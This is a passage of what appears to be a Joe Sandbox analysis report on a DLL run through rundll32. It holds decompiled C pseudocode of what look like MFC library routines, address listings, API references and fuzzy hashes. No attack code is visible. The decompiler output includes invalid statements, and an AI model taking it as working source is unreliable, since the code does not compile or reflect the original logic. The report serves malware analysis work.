                                                                                                        					_v12 = 0x80;
                                                                                                        					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00004000;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x800;
                                                                                                        					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00008000;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x400;
                                                                                                        					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00010000;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x200;
                                                                                                        					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00020000;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x100;
                                                                                                        					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00040000;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x8000;
                                                                                                        					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				_t191 = _v8;
                                                                                                        				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
                                                                                                        				_t139 =  *(_t191 + 0x18);
                                                                                                        				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
                                                                                                        				if((_t139 & 0x00003fc0) == 0x3fc0) {
                                                                                                        					 *(_t191 + 0x18) = _t139 | 0x00000010;
                                                                                                        					_t201 = _t201 | 0x00000010;
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				asm("sbb eax, eax");
                                                                                                        				_t144 =  ~((_t201 & _a4) - _a4) + 1;
                                                                                                        				__eflags = _t144;
                                                                                                        				return _t144;
                                                                                                        			}



























                                                                                                        0x10012406
                                                                                                        0x1001240c
                                                                                                        0x10012411
                                                                                                        0x10012419
                                                                                                        0x10012419
                                                                                                        0x1001241c
                                                                                                        0x00000000
                                                                                                        0x10012420
                                                                                                        0x10012426
                                                                                                        0x10012427
                                                                                                        0x10012428
                                                                                                        0x10012432
                                                                                                        0x10012434
                                                                                                        0x10012441
                                                                                                        0x10012444
                                                                                                        0x10012449
                                                                                                        0x10012452
                                                                                                        0x10012455
                                                                                                        0x1001245a
                                                                                                        0x1001245b
                                                                                                        0x1001245e
                                                                                                        0x10012461
                                                                                                        0x10012466
                                                                                                        0x10012467
                                                                                                        0x1001246e
                                                                                                        0x10012475
                                                                                                        0x1001247a
                                                                                                        0x1001247c
                                                                                                        0x1001247e
                                                                                                        0x1001247e
                                                                                                        0x1001247e
                                                                                                        0x1001247c
                                                                                                        0x1001247f
                                                                                                        0x10012483
                                                                                                        0x10012485
                                                                                                        0x1001248f
                                                                                                        0x10012490
                                                                                                        0x10012497
                                                                                                        0x1001249c
                                                                                                        0x1001249e
                                                                                                        0x100124a0
                                                                                                        0x100124a0
                                                                                                        0x100124a0
                                                                                                        0x1001249e
                                                                                                        0x100124a3
                                                                                                        0x100124a7
                                                                                                        0x100124ac
                                                                                                        0x100124ad
                                                                                                        0x100124b0
                                                                                                        0x100124b7
                                                                                                        0x100124be
                                                                                                        0x100124c3
                                                                                                        0x100124c5
                                                                                                        0x100124c7
                                                                                                        0x100124c7
                                                                                                        0x100124c7
                                                                                                        0x100124c5
                                                                                                        0x100124ca
                                                                                                        0x100124ce
                                                                                                        0x100124de
                                                                                                        0x100124e1
                                                                                                        0x100124e4
                                                                                                        0x100124e9
                                                                                                        0x100124eb
                                                                                                        0x100124ed
                                                                                                        0x100124ed
                                                                                                        0x100124ed
                                                                                                        0x100124eb
                                                                                                        0x100124f0
                                                                                                        0x100124f3
                                                                                                        0x10012503
                                                                                                        0x1001250a
                                                                                                        0x10012511
                                                                                                        0x10012516
                                                                                                        0x10012518
                                                                                                        0x1001251a
                                                                                                        0x1001251a
                                                                                                        0x1001251a
                                                                                                        0x10012518
                                                                                                        0x1001251c
                                                                                                        0x10012520
                                                                                                        0x1001252b
                                                                                                        0x10012537
                                                                                                        0x10012539
                                                                                                        0x10012539
                                                                                                        0x10012539
                                                                                                        0x10012539
                                                                                                        0x10012540
                                                                                                        0x10012544
                                                                                                        0x1001254c
                                                                                                        0x10012558
                                                                                                        0x10012558
                                                                                                        0x10012558
                                                                                                        0x1001255a
                                                                                                        0x1001255e
                                                                                                        0x10012569
                                                                                                        0x10012575
                                                                                                        0x10012575
                                                                                                        0x10012575
                                                                                                        0x1001257c
                                                                                                        0x1001257f
                                                                                                        0x10012586
                                                                                                        0x1001258e
                                                                                                        0x1001258e
                                                                                                        0x1001258e
                                                                                                        0x10012595
                                                                                                        0x10012598
                                                                                                        0x1001259f
                                                                                                        0x100125ab
                                                                                                        0x100125ab
                                                                                                        0x100125ab
                                                                                                        0x100125b2
                                                                                                        0x100125b5
                                                                                                        0x100125bc
                                                                                                        0x100125c8
                                                                                                        0x100125c8
                                                                                                        0x100125c8
                                                                                                        0x100125cf
                                                                                                        0x100125d2
                                                                                                        0x100125d9
                                                                                                        0x100125e5
                                                                                                        0x100125e5
                                                                                                        0x100125e5
                                                                                                        0x100125ec
                                                                                                        0x100125ef
                                                                                                        0x100125f6
                                                                                                        0x10012602
                                                                                                        0x10012602
                                                                                                        0x10012602
                                                                                                        0x10012609
                                                                                                        0x1001260c
                                                                                                        0x10012613
                                                                                                        0x1001261f
                                                                                                        0x1001261f
                                                                                                        0x1001261f
                                                                                                        0x10012626
                                                                                                        0x10012629
                                                                                                        0x10012630
                                                                                                        0x10012638
                                                                                                        0x10012638
                                                                                                        0x10012638
                                                                                                        0x1001263f
                                                                                                        0x10012642
                                                                                                        0x10012649
                                                                                                        0x10012651
                                                                                                        0x10012651
                                                                                                        0x10012651
                                                                                                        0x10012658
                                                                                                        0x1001265b
                                                                                                        0x10012662
                                                                                                        0x1001266e
                                                                                                        0x1001266e
                                                                                                        0x1001266e
                                                                                                        0x10012675
                                                                                                        0x10012678
                                                                                                        0x1001267f
                                                                                                        0x1001268b
                                                                                                        0x1001268b
                                                                                                        0x1001268b
                                                                                                        0x10012692
                                                                                                        0x10012695
                                                                                                        0x1001269c
                                                                                                        0x100126a4
                                                                                                        0x100126a4
                                                                                                        0x100126a4
                                                                                                        0x100126a6
                                                                                                        0x100126a9
                                                                                                        0x100126ac
                                                                                                        0x100126b8
                                                                                                        0x100126ba
                                                                                                        0x100126bf
                                                                                                        0x100126c2
                                                                                                        0x100126c2
                                                                                                        0x100126c2
                                                                                                        0x100126d1
                                                                                                        0x100126d3
                                                                                                        0x100126d3
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memset
                                                                                                        • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                        • API String ID: 2102423945-4122032997
                                                                                                        • Opcode ID: 6a965a47b8202c06a0f9d29b019c3ce5b36ca544f607173cb73e005fb23cc034
                                                                                                        • Instruction ID: 475a3f3acc0ffbf0912b6f4f501dab117ae518df3bc7e116c44220daacf7d2ae
                                                                                                        • Opcode Fuzzy Hash: 6a965a47b8202c06a0f9d29b019c3ce5b36ca544f607173cb73e005fb23cc034
                                                                                                        • Instruction Fuzzy Hash: 658130B5D00259AADB41CFA4C581BDEBBF8FF08384F118165F949EA181E774DAD4CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strlen$IconLoad_memset
                                                                                                        • String ID: 127.0.0.1
                                                                                                        • API String ID: 858515944-3619153832
                                                                                                        • Opcode ID: e9afa9abf4479f427d282929ffcd92459c0614fc8bef9fc4e3152ff44be5b39a
                                                                                                        • Instruction ID: 391a885bd144bb184e99009df4bcd3f8a2a5cd6933164126564d3f2e09fb5126
                                                                                                        • Opcode Fuzzy Hash: e9afa9abf4479f427d282929ffcd92459c0614fc8bef9fc4e3152ff44be5b39a
                                                                                                        • Instruction Fuzzy Hash: 835106B4D04298DBEB14CFA4D891B9DBBB1EF44344F1081A9E50D6B386DB356E44CF60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 88%
                                                                                                        			E1001486F(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
                                                                                                        				signed int _v8;
                                                                                                        				short _v72;
                                                                                                        				char* _v76;
                                                                                                        				signed int _v80;
                                                                                                        				signed int* _v84;
                                                                                                        				signed int _v88;
                                                                                                        				intOrPtr _v92;
                                                                                                        				void* __edi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t54;
                                                                                                        				void* _t66;
                                                                                                        				short* _t70;
                                                                                                        				signed int _t72;
                                                                                                        				signed int _t81;
                                                                                                        				signed int* _t83;
                                                                                                        				short* _t84;
                                                                                                        				void* _t91;
                                                                                                        				signed int* _t98;
                                                                                                        				signed int _t99;
                                                                                                        				void** _t100;
                                                                                                        				intOrPtr _t102;
                                                                                                        				signed int _t104;
                                                                                                        				signed int _t106;
                                                                                                        				void* _t107;
                                                                                                        
                                                                                                        				_t101 = __esi;
                                                                                                        				_t97 = __edx;
                                                                                                        				_t82 = __ebx;
                                                                                                        				_t54 =  *0x10057a08; // 0xef7d8b91
                                                                                                        				_v8 = _t54 ^ _t106;
                                                                                                        				_t100 = __ecx;
                                                                                                        				_v76 = _a4;
                                                                                                        				if(__ecx[1] != 0) {
                                                                                                        					_push(__ebx);
                                                                                                        					_push(__esi);
                                                                                                        					_t83 = GlobalLock( *__ecx);
                                                                                                        					_v84 = _t83;
                                                                                                        					_v88 = 0 | _t83[0] == 0x0000ffff;
                                                                                                        					_v80 = E100146B2(_t83);
                                                                                                        					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
                                                                                                        					_v92 = _t102;
                                                                                                        					if(_v88 == 0) {
                                                                                                        						 *_t83 =  *_t83 | 0x00000040;
                                                                                                        					} else {
                                                                                                        						_t83[3] = _t83[3] | 0x00000040;
                                                                                                        					}
                                                                                                        					if(lstrlenA(_v76) >= 0x20) {
                                                                                                        						L15:
                                                                                                        						_t66 = 0;
                                                                                                        					} else {
                                                                                                        						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
                                                                                                        						_v76 = _t97;
                                                                                                        						if(_t97 < _t102) {
                                                                                                        							goto L15;
                                                                                                        						} else {
                                                                                                        							_t70 = E100146DD(_t83);
                                                                                                        							_t91 = 0;
                                                                                                        							_t84 = _t70;
                                                                                                        							if(_v80 != 0) {
                                                                                                        								_t81 = E100169F6(_t84 + _t102);
                                                                                                        								_t97 = _v76;
                                                                                                        								_t91 = _t102 + 2 + _t81 * 2;
                                                                                                        							}
                                                                                                        							_t33 = _t97 + 3; // 0x3
                                                                                                        							_t98 = _v84;
                                                                                                        							_t36 = _t84 + 3; // 0x10002
                                                                                                        							_t72 = _t91 + _t36 & 0xfffffffc;
                                                                                                        							_t104 = _t84 + _t33 & 0xfffffffc;
                                                                                                        							_v80 = _t72;
                                                                                                        							if(_v88 == 0) {
                                                                                                        								_t99 =  *(_t98 + 8) & 0x0000ffff;
                                                                                                        							} else {
                                                                                                        								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
                                                                                                        							}
                                                                                                        							if(_v76 == _t91 || _t99 <= 0) {
                                                                                                        								L17:
                                                                                                        								 *_t84 = _a8;
                                                                                                        								_t97 =  &_v72;
                                                                                                        								E100147F2(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
                                                                                                        								_t100[1] = _t100[1] + _t104 - _v80;
                                                                                                        								GlobalUnlock( *_t100);
                                                                                                        								_t100[2] = _t100[2] & 0x00000000;
                                                                                                        								_t66 = 1;
                                                                                                        							} else {
                                                                                                        								_t97 = _t100[1];
                                                                                                        								_t95 = _t97 - _t72 + _v84;
                                                                                                        								if(_t97 - _t72 + _v84 <= _t97) {
                                                                                                        									E100147F2(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
                                                                                                        									_t107 = _t107 + 0x10;
                                                                                                        									goto L17;
                                                                                                        								} else {
                                                                                                        									goto L15;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_pop(_t101);
                                                                                                        					_pop(_t82);
                                                                                                        				} else {
                                                                                                        					_t66 = 0;
                                                                                                        				}
                                                                                                        				return E100167D5(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
                                                                                                        			}



























                                                                                                        0x1001486f
                                                                                                        0x1001486f
                                                                                                        0x1001486f
                                                                                                        0x10014875
                                                                                                        0x1001487c
                                                                                                        0x10014883
                                                                                                        0x10014889
                                                                                                        0x1001488c
                                                                                                        0x10014895
                                                                                                        0x10014896
                                                                                                        0x1001489f
                                                                                                        0x100148ad
                                                                                                        0x100148b0
                                                                                                        0x100148b8
                                                                                                        0x100148ce
                                                                                                        0x100148d0
                                                                                                        0x100148d3
                                                                                                        0x100148db
                                                                                                        0x100148d5
                                                                                                        0x100148d5
                                                                                                        0x100148d5
                                                                                                        0x100148ea
                                                                                                        0x10014968
                                                                                                        0x10014968
                                                                                                        0x100148ec
                                                                                                        0x10014901
                                                                                                        0x10014906
                                                                                                        0x10014909
                                                                                                        0x00000000
                                                                                                        0x1001490b
                                                                                                        0x1001490c
                                                                                                        0x10014912
                                                                                                        0x10014917
                                                                                                        0x10014919
                                                                                                        0x1001491f
                                                                                                        0x10014924
                                                                                                        0x10014928
                                                                                                        0x10014928
                                                                                                        0x1001492c
                                                                                                        0x10014930
                                                                                                        0x10014933
                                                                                                        0x10014937
                                                                                                        0x1001493a
                                                                                                        0x10014941
                                                                                                        0x10014944
                                                                                                        0x1001494c
                                                                                                        0x10014946
                                                                                                        0x10014946
                                                                                                        0x10014946
                                                                                                        0x10014953
                                                                                                        0x10014978
                                                                                                        0x1001497f
                                                                                                        0x10014988
                                                                                                        0x10014990
                                                                                                        0x1001499d
                                                                                                        0x100149a0
                                                                                                        0x100149a6
                                                                                                        0x100149ac
                                                                                                        0x1001495a
                                                                                                        0x1001495a
                                                                                                        0x10014961
                                                                                                        0x10014966
                                                                                                        0x10014970
                                                                                                        0x10014975
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10014966
                                                                                                        0x10014953
                                                                                                        0x10014909
                                                                                                        0x100149ad
                                                                                                        0x100149ae
                                                                                                        0x1001488e
                                                                                                        0x1001488e
                                                                                                        0x1001488e
                                                                                                        0x100149bb

                                                                                                        APIs
                                                                                                        • GlobalLock.KERNEL32 ref: 10014899
                                                                                                        • lstrlenA.KERNEL32(?), ref: 100148E1
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 100148FB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                        • String ID: System
                                                                                                        • API String ID: 1529587224-3470857405
                                                                                                        • Opcode ID: 5539861cf9964bd4a1f8d2b85f820bea2489ddcf645bd320d082abb330923d9c
                                                                                                        • Instruction ID: 74ffa1d7f554f06ed3380e5a1b3eb1278af2c0b09513685a0b874fafc39ddc5e
                                                                                                        • Opcode Fuzzy Hash: 5539861cf9964bd4a1f8d2b85f820bea2489ddcf645bd320d082abb330923d9c
                                                                                                        • Instruction Fuzzy Hash: FA41B271D00225DFDB04DFA4C885AAEBBB5FF04354F268129E411EF195EB70E986CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 77%
                                                                                                        			E1000B3AF(void* __edx, signed int _a116, char _a120) {
                                                                                                        				void _v12;
                                                                                                        				char _v16;
                                                                                                        				signed int _v20;
                                                                                                        				int _v24;
                                                                                                        				char _v124;
                                                                                                        				char _v172;
                                                                                                        				intOrPtr _v184;
                                                                                                        				int __ebx;
                                                                                                        				signed int __edi;
                                                                                                        				signed int __esi;
                                                                                                        				signed int __ebp;
                                                                                                        				signed int _t26;
                                                                                                        				unsigned int _t28;
                                                                                                        				intOrPtr _t35;
                                                                                                        				unsigned int _t39;
                                                                                                        				intOrPtr _t40;
                                                                                                        				void* _t42;
                                                                                                        				void* _t43;
                                                                                                        				signed int _t45;
                                                                                                        
                                                                                                        				_t45 =  &_v124;
                                                                                                        				_t26 =  *0x10057a08; // 0xef7d8b91
                                                                                                        				_a116 = _t26 ^ _t45;
                                                                                                        				_push(_t43);
                                                                                                        				_push(_t42);
                                                                                                        				_t28 = GetMenuCheckMarkDimensions();
                                                                                                        				_t38 = _t28;
                                                                                                        				_t39 = _t28 >> 0x10;
                                                                                                        				_v24 = _t39;
                                                                                                        				if(_t28 <= 4 || __ecx <= 5) {
                                                                                                        					_push(_t45);
                                                                                                        					_push(_t39);
                                                                                                        					_v172 = 0x10057298;
                                                                                                        					E10017C83( &_v172, 0x1002e2fc);
                                                                                                        					asm("int3");
                                                                                                        					_push(4);
                                                                                                        					E10017BC1(E10027DEC, _t38, _t42, _t43);
                                                                                                        					_t40 = E10013965(0x104);
                                                                                                        					_v184 = _t40;
                                                                                                        					_t35 = 0;
                                                                                                        					_v172 = 0;
                                                                                                        					if(_t40 != 0) {
                                                                                                        						_t35 = E1000CF71(_t40);
                                                                                                        					}
                                                                                                        					return E10017C60(_t35);
                                                                                                        				} else {
                                                                                                        					if(__ebx > 0x20) {
                                                                                                        						__ebx = 0x20;
                                                                                                        					}
                                                                                                        					__eax = __ebx - 4;
                                                                                                        					asm("cdq");
                                                                                                        					__eax = __ebx - 4 - __edx;
                                                                                                        					__esi = __ebx + 0xf;
                                                                                                        					__esi = __ebx + 0xf >> 4;
                                                                                                        					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
                                                                                                        					__esi = __esi << 4;
                                                                                                        					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
                                                                                                        					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
                                                                                                        					if(__edi > 0xc) {
                                                                                                        						__edi = 0xc;
                                                                                                        					}
                                                                                                        					__eax = 0x20;
                                                                                                        					if(__ecx > __eax) {
                                                                                                        						_v24 = __eax;
                                                                                                        					}
                                                                                                        					 &_v12 = E100174D0(__edi,  &_v12, 0xff, 0x80);
                                                                                                        					_v24 = _v24 + 0xfffffffa;
                                                                                                        					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
                                                                                                        					__ecx = __esi + __esi;
                                                                                                        					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
                                                                                                        					__edx = 0x1002a144;
                                                                                                        					_v20 = __esi + __esi;
                                                                                                        					_v16 = 5;
                                                                                                        					do {
                                                                                                        						__si =  *__edx & 0x000000ff;
                                                                                                        						__ecx = __edi;
                                                                                                        						__si = ( *__edx & 0x000000ff) << __cl;
                                                                                                        						__edx =  &(__edx[1]);
                                                                                                        						__ecx = __si & 0x0000ffff;
                                                                                                        						__eax->i = __ch;
                                                                                                        						__eax->i = __cl;
                                                                                                        						__eax = __eax + _v20;
                                                                                                        						_t21 =  &_v16;
                                                                                                        						 *_t21 = _v16 - 1;
                                                                                                        					} while ( *_t21 != 0);
                                                                                                        					__eax =  &_v12;
                                                                                                        					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
                                                                                                        					_pop(__edi);
                                                                                                        					_pop(__esi);
                                                                                                        					 *0x1005aa80 = __eax;
                                                                                                        					_pop(__ebx);
                                                                                                        					if(__eax == 0) {
                                                                                                        						__eax = LoadBitmapA(__eax, 0x7fe3);
                                                                                                        						 *0x1005aa80 = __eax;
                                                                                                        					}
                                                                                                        					__ecx = _a116;
                                                                                                        					__ecx = _a116 ^ __ebp;
                                                                                                        					__eax = E100167D5(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
                                                                                                        					__ebp =  &_a120;
                                                                                                        					__esp =  &_a120;
                                                                                                        					_pop(__ebp);
                                                                                                        					return __eax;
                                                                                                        				}
                                                                                                        			}






















                                                                                                        0x1000b3b0
                                                                                                        0x1000b3ba
                                                                                                        0x1000b3c1
                                                                                                        0x1000b3c5
                                                                                                        0x1000b3c6
                                                                                                        0x1000b3c7
                                                                                                        0x1000b3cd
                                                                                                        0x1000b3d6
                                                                                                        0x1000b3d9
                                                                                                        0x1000b3dc
                                                                                                        0x1000a0db
                                                                                                        0x1000a0de
                                                                                                        0x1000a0e8
                                                                                                        0x1000a0ef
                                                                                                        0x1000a0f4
                                                                                                        0x1000a0f5
                                                                                                        0x1000a0fc
                                                                                                        0x1000a10b
                                                                                                        0x1000a10d
                                                                                                        0x1000a110
                                                                                                        0x1000a114
                                                                                                        0x1000a117
                                                                                                        0x1000a119
                                                                                                        0x1000a119
                                                                                                        0x1000a123
                                                                                                        0x1000b3e8
                                                                                                        0x1000b3eb
                                                                                                        0x1000b3ef
                                                                                                        0x1000b3ef
                                                                                                        0x1000b3f0
                                                                                                        0x1000b3f3
                                                                                                        0x1000b3f4
                                                                                                        0x1000b3f6
                                                                                                        0x1000b3f9
                                                                                                        0x1000b3fe
                                                                                                        0x1000b402
                                                                                                        0x1000b405
                                                                                                        0x1000b407
                                                                                                        0x1000b40c
                                                                                                        0x1000b410
                                                                                                        0x1000b410
                                                                                                        0x1000b413
                                                                                                        0x1000b416
                                                                                                        0x1000b418
                                                                                                        0x1000b418
                                                                                                        0x1000b429
                                                                                                        0x1000b431
                                                                                                        0x1000b439
                                                                                                        0x1000b43c
                                                                                                        0x1000b43f
                                                                                                        0x1000b443
                                                                                                        0x1000b448
                                                                                                        0x1000b44b
                                                                                                        0x1000b452
                                                                                                        0x1000b452
                                                                                                        0x1000b456
                                                                                                        0x1000b458
                                                                                                        0x1000b45b
                                                                                                        0x1000b45f
                                                                                                        0x1000b462
                                                                                                        0x1000b464
                                                                                                        0x1000b467
                                                                                                        0x1000b46a
                                                                                                        0x1000b46a
                                                                                                        0x1000b46a
                                                                                                        0x1000b46f
                                                                                                        0x1000b47b
                                                                                                        0x1000b483
                                                                                                        0x1000b484
                                                                                                        0x1000b485
                                                                                                        0x1000b48a
                                                                                                        0x1000b48b
                                                                                                        0x1000b493
                                                                                                        0x1000b499
                                                                                                        0x1000b499
                                                                                                        0x1000b49e
                                                                                                        0x1000b4a1
                                                                                                        0x1000b4a3
                                                                                                        0x1000b4a8
                                                                                                        0x1000b4ab
                                                                                                        0x1000b4ab
                                                                                                        0x1000b4ac
                                                                                                        0x1000b4ac

                                                                                                        APIs
                                                                                                        • GetMenuCheckMarkDimensions.USER32 ref: 1000B3C7
                                                                                                        • _memset.LIBCMT ref: 1000B429
                                                                                                        • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 1000B47B
                                                                                                        • LoadBitmapA.USER32 ref: 1000B493
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 4271682439-3916222277
                                                                                                        • Opcode ID: b2a79c12d357676e4b0d2bf410ff4187b19c80d36ed6dad2827428fa924ab4b7
                                                                                                        • Instruction ID: 72b3b778e8896de6b9c4d2b5d37ea691cdfdc38a5381d0430ce67680fa501abd
                                                                                                        • Opcode Fuzzy Hash: b2a79c12d357676e4b0d2bf410ff4187b19c80d36ed6dad2827428fa924ab4b7
                                                                                                        • Instruction Fuzzy Hash: 5931F572A0065A9FFB10CF78CCC6AAE7BB5EB44384F25052AE506EB1C5D730EA45C750
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 58%
                                                                                                        			E1000D86F(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                        				void _v20;
                                                                                                        				int _t14;
                                                                                                        				int _t18;
                                                                                                        				intOrPtr* _t23;
                                                                                                        				void* _t25;
                                                                                                        
                                                                                                        				if(E1000D6C3() == 0) {
                                                                                                        					if(_a4 != 0x12340042) {
                                                                                                        						L9:
                                                                                                        						_t14 = 0;
                                                                                                        						L10:
                                                                                                        						return _t14;
                                                                                                        					}
                                                                                                        					_t23 = _a8;
                                                                                                        					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
                                                                                                        						goto L9;
                                                                                                        					} else {
                                                                                                        						 *((intOrPtr*)(_t23 + 4)) = 0;
                                                                                                        						 *((intOrPtr*)(_t23 + 8)) = 0;
                                                                                                        						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
                                                                                                        						_t18 = GetSystemMetrics(1);
                                                                                                        						asm("movsd");
                                                                                                        						asm("movsd");
                                                                                                        						asm("movsd");
                                                                                                        						asm("movsd");
                                                                                                        						 *(_t23 + 0x10) = _t18;
                                                                                                        						 *((intOrPtr*)(_t23 + 0x24)) = 1;
                                                                                                        						if( *_t23 >= 0x48) {
                                                                                                        							E100199D4(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
                                                                                                        						}
                                                                                                        						_t14 = 1;
                                                                                                        						goto L10;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return  *0x1005a760(_a4, _a8);
                                                                                                        			}








                                                                                                        0x1000d87c
                                                                                                        0x1000d895
                                                                                                        0x1000d900
                                                                                                        0x1000d900
                                                                                                        0x1000d902
                                                                                                        0x00000000
                                                                                                        0x1000d903
                                                                                                        0x1000d897
                                                                                                        0x1000d89e
                                                                                                        0x00000000
                                                                                                        0x1000d8b7
                                                                                                        0x1000d8b8
                                                                                                        0x1000d8bb
                                                                                                        0x1000d8c9
                                                                                                        0x1000d8cc
